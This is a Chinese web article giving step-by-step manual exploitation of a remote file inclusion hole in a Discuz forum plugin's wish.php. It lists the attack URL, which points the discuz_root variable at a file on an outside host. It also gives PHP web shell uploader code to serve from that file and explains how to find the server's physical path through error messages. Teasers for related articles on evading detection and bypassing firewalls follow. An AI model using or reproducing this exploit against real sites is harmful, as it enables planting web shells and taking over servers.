许愿池插件的wish.php文件出的问题: require$discuz_root.'./include/discuzcode.func.php'; 手工利用方法: 远程包含漏洞,变量discuz_r
许愿池插件的wish.php文件出的问题:
require $discuz_root.'./include/discuzcode.func.php';
手工利用方法:
远程包含漏洞,变量discuz_root过滤不严,利用方法:
http://url/wish.php?discuz_root=http://www.neeao.com/xxxx.txt?
不一定非要txt后缀,可以改为任意后缀,后面一定要记得加问号。
这里xxxx.txt用cn.tink的那个小马写个shell进去:
<?copy($_files[myfile][tmp_name],"c:\inetpub\vhosts\baidu.com\bbs\guizai.php");?>
<form enctype="multipart/form-data" action="" method="post">
<input name="myfile" type="file">
<input value=" 提交 " type="submit">
</form>
网站物理路径可以通过提交http://url/wish.php?discuz_root=http://www.huaidan.org/xxxx.txt ,看错误提示信息,然后修改xxxx.txt中的路径即可。 guizai.php就是你上传的shell的名字。
相关文章:
-
-
如何追踪入侵者
在区域网路上可能你听过所谓「广播模式」的资料发送方法,此种方法不指定收信站,只要和此网路连结的所有网路设备皆为收信对象。但是这仅仅在区域网路上能够实行,因为区域...
[阅读全文]
-
-
黑客避开检测的手段
黑客的聪明并不只是在于他们知道如何去入侵服务器,还在于他们知道如何去伪装自己的攻击。恶意的攻击者会使用多种逃避的手段来让自己不会被检测到,所以作为系统管理员,也...
[阅读全文]
-
新欢乐时光代码分析
<% diminwhere,htmltext,vbstext,degreesign,appleobject,fso,wsshell,winpath,sub...
[阅读全文]
-
如何突破各种防火墙的防护
现在随着人们的安全意识加强,防火墙一般都被公司企业采用来保障网络的安全,一般的攻击者在有防火墙的情况下,一般是很难入侵的。下面谈谈有防火墙环境下的攻击和检测。 ...
[阅读全文]
版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。
如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。
发表评论